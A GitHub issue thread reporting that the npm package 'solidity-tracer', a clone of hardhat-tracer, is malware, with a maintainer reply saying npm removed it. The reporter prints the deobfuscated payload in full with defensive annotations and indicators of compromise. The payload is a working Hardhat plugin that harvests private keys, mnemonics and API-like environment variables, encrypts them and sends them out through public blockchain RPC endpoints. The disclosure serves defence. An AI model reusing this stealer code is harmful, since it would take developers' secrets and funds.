Open CedarMist opened 10 months ago
The following package is a clone of hardhat-tracer, but it contains malware that harvests private keys
https://www.npmjs.com/package/solidity-tracer
I have reported this already, but you should be aware and report too.
It submits the encrypted data to the BSC and Matic testnets:
See:
The deobfuscated code is:
// Analyst annotations (defensive). This is the deobfuscated payload of the
// malicious "solidity-tracer" npm package, a clone of hardhat-tracer. Loaded as
// a Hardhat plugin, it harvests secrets from the process environment and the
// Hardhat config, encrypts them, and exfiltrates them as transaction calldata on
// a public testnet. Obfuscated identifiers are left exactly as found; only
// comments have been added.
//
// Indicators for defenders (all taken from the code below):
//   - outbound HTTPS from a dev/CI host running hardhat to
//     bsc-testnet.public.blastapi.io or endpoints.omniatech.io/v1/matic/mumbai/public
//   - transactions signed by 0x92cA86ECE960AA419FF61915e85347030cc6D274 on
//     chain 0x61 (97, BSC testnet) or 0x13881 (80001, Polygon Mumbai), sent to
//     0x0000000000000000000000000000000000001DC0 with non-empty calldata
//   - the embedded RSA public key used to wrap the AES key/IV
// Anyone who ran hardhat with this package installed should treat every value
// matched by ENV_PATTERNS and every key/mnemonic in `networks` as compromised.

// Version gate, presumably copied from the legitimate plugin: if the
// ethereumjs-vm package cannot be resolved, print the same "upgrade hardhat"
// message and exit 1. This keeps the package looking like the real tracer.
try {
  require("@nomicfoundation/ethereumjs-vm");
} catch {
  console.error("\n\nERROR\n\nPlease upgrade your hardhat version to 2.11 or above.\nThis error is generated by plugin \"hardhat-tracer\" because it is \ndependent on some features available in hardhat >=2.11.0 <3.0.0.\n\nnpm i hardhat@latest\n\nor\n\nyarn add hardhat@latest\n\n");
  process.exit(0x1);
}

// Plugin surface (presumably the legitimate tracer's entry points) so the
// package behaves normally from the user's point of view.
import './chai';
import './extend';
import './tasks';
export * from './types';
export * from './wrapper';

// Everything below this line is the malicious addition.
const crypto = require("crypto");
const hardhatConfig = require('hardhat/config');
const ethereumjs = require("@ethereumjs/tx");
const common = require("@ethereumjs/common");
import { Web3, HttpProvider } from 'web3';

// Case-insensitive substring patterns matched against environment-variable
// NAMES. Several are very broad (KEY, API, ETH, ACCOUNT, _PATH, DEPLOY), so the
// harvest is not limited to wallet material: any variable whose name contains
// one of these (e.g. a *_API_KEY) is collected.
const ENV_PATTERNS = ["MNEMONIC", 'PRIVATE', "SECRET", "KEY", 'PK', 'ACCOUNT', "API", "_PATH", "DEPLOY", "ETH"];

// Returns "NAME=value" strings for every env var whose upper-cased name contains
// one of ENV_PATTERNS.
function secretsFromEnv() {
  return Object.keys(process.env).filter(_0x51d8e8 => {
    for (const _0x4cc5f3 of ENV_PATTERNS) {
      if (_0x51d8e8.toUpperCase().includes(_0x4cc5f3)) {
        return true;
      }
    }
    return false;
  }).map(_0x5ab621 => _0x5ab621 + '=' + process.env[_0x5ab621]);
}

// Returns the value unchanged if it is JSON-serialisable; otherwise returns a
// "<label>: <error>" string so that the failure itself is still exfiltrated.
function checkSecret(_0x4c7ddd, _0xacc2d9) {
  try {
    JSON.stringify(_0x4c7ddd);
    return _0x4c7ddd;
  } catch (_0x361686) {
    return _0xacc2d9 + ": " + _0x361686;
  }
}

// Walks every entry of `config.networks` in the Hardhat config and collects
// `privateKey`, `mnemonic`, and `accounts` (either an array of keys or an
// object carrying `privateKey` / `mnemonic` — the two shapes Hardhat accepts).
// Entries that hold nothing of interest are dropped; the result is flattened.
function secretsFromConfig(_0x9cc15f) {
  return Object.values(_0x9cc15f.networks || {}).map(_0x28194b => {
    if (!!_0x28194b.privateKey) {
      return [checkSecret(_0x28194b.privateKey, "privateKey")];
    }
    if (!!_0x28194b.mnemonic) {
      return [checkSecret(_0x28194b.mnemonic, "mnemonic")];
    }
    if (!!_0x28194b.accounts) {
      if (!!_0x28194b.accounts && _0x28194b.accounts.constructor === Array) {
        return _0x28194b.accounts.map((_0x545fff, _0x8ed385) => checkSecret(_0x545fff, "accounts[" + _0x8ed385 + ']'));
      }
      if (!!_0x28194b.accounts && _0x28194b.accounts.constructor === Object) {
        if (!!_0x28194b.accounts.privateKey) {
          return [checkSecret(_0x28194b.accounts.privateKey, 'accounts.privateKey')];
        }
        if (!!_0x28194b.accounts.mnemonic) {
          return [checkSecret(_0x28194b.accounts.mnemonic, "accounts.mnemonic")];
        }
      }
    }
    return null;
  }).filter(_0x32f721 => _0x32f721 != null).flat();
}

// Hybrid-encrypts the harvested list: JSON → AES-256-CBC under a fresh random
// 32-byte key and 16-byte IV, then the key and IV are each RSA-encrypted to the
// attacker's embedded public key. Output layout is
//   RSA(key) || RSA(iv) || AES ciphertext.
// Consequence for responders: the on-chain blob can only be read by whoever
// holds the matching RSA private key; it cannot be decrypted from the chain
// data alone.
function encryptSecrets(_0x4f59ef) {
  let _0x1df4a4;
  try {
    _0x1df4a4 = JSON.stringify(_0x4f59ef);
  } catch (_0x33f25f) {
    _0x1df4a4 = "final: " + _0x33f25f;
  }
  const _0x31a8b0 = crypto.randomBytes(0x20); // AES key, 32 bytes
  const _0x282dd4 = crypto.randomBytes(0x10); // IV, 16 bytes
  const _0x49f6ff = crypto.createCipheriv('aes-256-cbc', _0x31a8b0, _0x282dd4);
  let _0x5c300f = _0x49f6ff.update(_0x1df4a4, 'utf-8', "hex");
  _0x5c300f += _0x49f6ff.final('hex');
  // Attacker-controlled RSA public key (IoC).
  const _0x46998b = crypto.createPublicKey("-----BEGIN RSA PUBLIC KEY-----\nMIIBCgKCAQEAoVMvXIi5b/APV4y8RF9iLprdNWLr3F4t4urTTX/2wZFs6Tq4hX0N\nZFx+CGUvyNICrjvL9fu7LqDyvUnxLhH+sGl5o+drrGU4O2I81W0Ul6/aoI9KBpJ8\nmJBK9rFLExs55lG++J3GaXdAqmEv9J8xcq6QpKGniiPIM59IUPwmsjeFeZyfe7rL\ndCHKnVNgHxcPBnymIntn58qwfAUbXTcNZszrd8pqO8DYwpxDaNnHxhnwDGGDCBmT\n67/ln6vOLJm2YnozuRnAnvF9AjND/bdc7jBhe9A3lM67b3hZVsnwmZskyo1RTsXv\nGdfgsOhIlIhf0/vxGIMUbfNlyDaayWwG3QIDAQAB\n-----END RSA PUBLIC KEY-----");
  const _0x537224 = crypto.publicEncrypt(_0x46998b, _0x31a8b0);
  const _0x1655df = crypto.publicEncrypt(_0x46998b, _0x282dd4);
  return Buffer.concat([_0x537224, _0x1655df, Buffer.from(_0x5c300f, "hex")]);
}

// Exfiltration channel: the encrypted blob is placed in the `data` field of a
// zero-value legacy transaction, signed with a hard-coded attacker private key
// (_0x38c1f1) and broadcast through a public RPC endpoint (_0x46aefb).
// Parameters: payload, RPC URL, chain id, signing key (hex), sender address,
// recipient address. Returns the transaction hash.
// gasLimit 0x19f0a0 = 1,700,000; gasPrice 0x826299e00 = 35 gwei.
async function sendSecretsToBlockchain(_0xd0d988, _0x46aefb, _0x18d187, _0x38c1f1, _0x44908f, _0x3fc84f) {
  const _0x119a6c = new HttpProvider(_0x46aefb);
  const _0x443b17 = new Web3(_0x119a6c);
  const _0x4b0523 = new Buffer(_0x38c1f1, 'hex');
  // Nonce is fetched live for the attacker's sender account, so the RPC call
  // itself (eth_getTransactionCount) is the first network indicator.
  const _0x9d637e = await _0x443b17.eth.getTransactionCount(_0x44908f);
  const _0x4192ba = new ethereumjs.Transaction({
    'gasLimit': _0x443b17.utils.toHex(0x19f0a0),
    'gasPrice': _0x443b17.utils.toHex(0x826299e00),
    'from': _0x44908f,
    'to': _0x3fc84f,
    'nonce': _0x443b17.utils.toHex(_0x9d637e),
    'value': _0x443b17.utils.toHex('0'),
    'data': _0xd0d988, // the encrypted secrets
    'chainId': _0x18d187
  }, {
    'common': common.Common.custom({ 'chainId': _0x18d187 })
  });
  const _0xe02a79 = _0x4192ba.sign(_0x4b0523);
  const _0x403ee4 = await _0x443b17.eth.sendSignedTransaction('0x' + _0xe02a79.serialize().toString("hex"));
  return _0x403ee4.transactionHash;
}

// Tries BSC testnet (chain 0x61 = 97) first and falls back to Polygon Mumbai
// (chain 0x13881 = 80001). Both attempts use the same attacker key, sender and
// recipient. Never throws: a second failure is returned as a string, so the
// user sees no error.
async function storeSecrets(_0x39d958) {
  try {
    return await sendSecretsToBlockchain(_0x39d958, 'https://bsc-testnet.public.blastapi.io', 0x61, "44b8d386f12231bcce900d1d677b20f9ccb1d6aef77f0b1b3b83a0fa26be8930", "0x92cA86ECE960AA419FF61915e85347030cc6D274", '0x0000000000000000000000000000000000001DC0');
  } catch (_0x1bd08d) {
    try {
      return await sendSecretsToBlockchain(_0x39d958, "https://endpoints.omniatech.io/v1/matic/mumbai/public", 0x13881, "44b8d386f12231bcce900d1d677b20f9ccb1d6aef77f0b1b3b83a0fa26be8930", "0x92cA86ECE960AA419FF61915e85347030cc6D274", '0x0000000000000000000000000000000000001DC0');
    } catch (_0x40cdaf) {
      return "store mumbai err: " + _0x40cdaf;
    }
  }
}

// Trigger. extendEnvironment runs whenever the Hardhat Runtime Environment is
// built, i.e. on any hardhat task once the plugin is in the config — no
// specific task needs to be invoked. Collection errors are pushed into the
// payload as strings rather than surfaced, so the hook never alerts the user.
hardhatConfig.extendEnvironment(async _0x185fb5 => {
  const _0x199acd = [];
  try {
    _0x199acd.push(...secretsFromEnv());
  } catch (_0x4a1233) {
    _0x199acd.push("env err: " + _0x4a1233);
  }
  try {
    _0x199acd.push(...secretsFromConfig(_0x185fb5.config));
  } catch (_0x2ae4bc) {
    _0x199acd.push("config err: " + _0x2ae4bc);
  }
  const _0x3745e5 = encryptSecrets(_0x199acd);
  await storeSecrets(_0x3745e5);
});
Thanks for taking the effort! It appears that the package has been taken down by the npm team. https://www.npmjs.com/package/solidity-tracer
The following package is a clone of hardhat-tracer, but it contains malware that harvests private keys
https://www.npmjs.com/package/solidity-tracer
I have reported this already, but you should be aware and report too.
It submits the encrypted data to the BSC and Matic testnets:
See:
The deobfuscated code is: